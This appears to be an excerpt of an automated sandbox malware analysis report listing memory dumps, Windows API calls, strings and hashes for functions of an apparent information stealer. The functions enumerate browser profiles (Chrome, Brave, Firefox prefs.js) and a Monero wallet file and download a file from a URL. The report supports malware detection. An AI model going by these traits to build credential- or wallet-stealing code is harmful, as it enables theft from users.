Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: f290cf21666eb10e707f298f041c766befe62196a7856d5291c02e1bb9463f80
Instruction ID: 8c0cd8729047e96b3891c681aec41e0ea20f05a6cf33ff836e79cf742212e183
Opcode Fuzzy Hash: f290cf21666eb10e707f298f041c766befe62196a7856d5291c02e1bb9463f80
Instruction Fuzzy Hash: B34210729101189BCB18FBA4ED96EED737DFF98300F404568F906D6181EE349A89CB97

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
__aulldiv.LIBCMT ref: 6C6536E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C653773
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C65377E
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C6537BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C6537C4
EnterCriticalSection.KERNEL32(6C6DF688), ref: 6C6537CB
LeaveCriticalSection.KERNEL32(6C6DF688), ref: 6C653801
__aulldiv.LIBCMT ref: 6C653883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C653902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C653918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C65394C

Strings

GTC, xrefs: 6C653912
QPC, xrefs: 6C6538FC
AuthcAMDenti, xrefs: 6C653946
GenuntelineI, xrefs: 6C653639
MOZ_TIMESTAMP_MODE, xrefs: 6C6535DB

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction ID: 14d1dd1505aced9cd8b45279eaef959e336740e5ad629c5ecbd62bb5e6e0c917
Opcode Fuzzy Hash: 3f96159be758dedfed38ec7b8d465651a4db19bfd3eb02ba300bdcb48bdc3dd7
Instruction Fuzzy Hash: B0B1B4B1B083509FDB08DF2AC89461AB7F5EB8A700F15893DF499D3790D770A9018B8E

Function 00823EA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00823EC3
FindFirstFileA.KERNEL32(?,?), ref: 00823EDA
StrCmpCA.SHLWAPI(?,00830FAC), ref: 00823F08
StrCmpCA.SHLWAPI(?,00830FB0), ref: 00823F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0082406C
FindClose.KERNEL32(000000FF), ref: 00824081

Strings

%s\%s, xrefs: 00823EB7
`, xrefs: 00823F4F

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$`
API String ID: 180737720-4163632960
Opcode ID: 75de7335c43b8f06cb459abdeeb655663e41dcc24571b548971a10c582ac6892
Instruction ID: 26a865c35443c191b905c6ea95f9f31c3fc1c83966dd6feda7c25c17f32c76dc
Opcode Fuzzy Hash: 75de7335c43b8f06cb459abdeeb655663e41dcc24571b548971a10c582ac6892
Instruction Fuzzy Hash: F05147B2900218ABCB24EBB4EC85EEA777CFF54301F004688B659D6080DB759BC68F91

Function 008160A0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0082A7E6

Part of subcall function 008147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814839
Part of subcall function 008147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814849

InternetOpenA.WININET(00830DF7,00000001,00000000,00000000,00000000), ref: 0081610F
StrCmpCA.SHLWAPI(?,00EFE270), ref: 00816147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0081618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008161B3
InternetReadFile.WININET(?,?,00000400,?), ref: 008161DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0081620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00816249
InternetCloseHandle.WININET(?), ref: 00816253
InternetCloseHandle.WININET(00000000), ref: 00816260

Strings

p, xrefs: 00816139

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: p
API String ID: 2507841554-2678736219
Opcode ID: 41352ffc952f99369301fb8d71568b0b83d1ecd4b07b78960b22ce5355dd75a3
Instruction ID: e0c1c032e42af6c8497b0df83156025287e5c371b0605c13e43dffb4382ea4d0
Opcode Fuzzy Hash: 41352ffc952f99369301fb8d71568b0b83d1ecd4b07b78960b22ce5355dd75a3
Instruction Fuzzy Hash: 0D514EB1A00218ABDB24DB90DC45BEE77B8FF48705F108198A645E71C1EB746AC5CF96

Function 0081F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008315B8,00830D96), ref: 0081F71E
StrCmpCA.SHLWAPI(?,008315BC), ref: 0081F76F
StrCmpCA.SHLWAPI(?,008315C0), ref: 0081F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0081FAB1
FindClose.KERNEL32(000000FF), ref: 0081FAC3

Strings

prefs.js, xrefs: 0081F812

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 6423fe8c09a3a6bae2738670ec0351f112a06fd4cd53161e569bb027b187ac12
Instruction ID: 3095541b92a36d14342514e21ad34438e2202c04336dce8338e1978f9277545b
Opcode Fuzzy Hash: 6423fe8c09a3a6bae2738670ec0351f112a06fd4cd53161e569bb027b187ac12
Instruction Fuzzy Hash: 67B104719001289BDB28FF64EC96AED7779FF54300F4085A8E50AD6192EF345B89CB93

Function 008116D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0083510C,?,?,?,008351B4,?,?,00000000,?,00000000), ref: 00811923
StrCmpCA.SHLWAPI(?,0083525C), ref: 00811973
StrCmpCA.SHLWAPI(?,00835304), ref: 00811989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00811D40
DeleteFileA.KERNEL32(00000000), ref: 00811DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00811E20
FindClose.KERNEL32(000000FF), ref: 00811E32

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

Strings

\*.*, xrefs: 008117F1

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 8a3913297a8188b3791daa573367fc79c6b08fea1c9dadec0dade9e930e95b9f
Instruction ID: 85970d0f9cc0ac18f46abc96a677f0a9425faba911ddb788b1aae7e4d4dca6c3
Opcode Fuzzy Hash: 8a3913297a8188b3791daa573367fc79c6b08fea1c9dadec0dade9e930e95b9f
Instruction Fuzzy Hash: FF12DD719101289BDB19EB64EC96AEE7378FF54300F4045A9E51AE2191EF306FC9CF92

Function 0081DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

Part of subcall function 0082A920: lstrcpy.KERNEL32(00000000,?), ref: 0082A972
Part of subcall function 0082A920: lstrcat.KERNEL32(00000000), ref: 0082A982

Part of subcall function 0082A9B0: lstrlen.KERNEL32(?,00EF8A10,?,\Monero\wallet.keys,00830E17), ref: 0082A9C5
Part of subcall function 0082A9B0: lstrcpy.KERNEL32(00000000), ref: 0082AA04
Part of subcall function 0082A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AA12

Part of subcall function 0082A8A0: lstrcpy.KERNEL32(?,00830E17), ref: 0082A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008314B0,00830C2A), ref: 0081DAEB
StrCmpCA.SHLWAPI(?,008314B4), ref: 0081DB33
StrCmpCA.SHLWAPI(?,008314B8), ref: 0081DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0081DDCC
FindClose.KERNEL32(000000FF), ref: 0081DDDE

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: e2c48a2a25b6cabb94bc74d47971f147b535cbc19ef1f469645def5a6c5f0c22
Instruction ID: a0a20bd7c830043bce6603deeee16528238dc36ead105c18212cf109016b125e
Opcode Fuzzy Hash: e2c48a2a25b6cabb94bc74d47971f147b535cbc19ef1f469645def5a6c5f0c22
Instruction Fuzzy Hash: 719125729002149BCB18FBB4EC969ED737DFF98300F408668F956D6141EE349B898B93

Function 00827B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A740: lstrcpy.KERNEL32(00830E17,00000000), ref: 0082A788

GetKeyboardLayoutList.USER32(00000000,00000000,008305AF), ref: 00827BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00827BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00827C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00827C62
LocalFree.KERNEL32(00000000), ref: 00827D22

Strings

/ , xrefs: 00827C7F

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
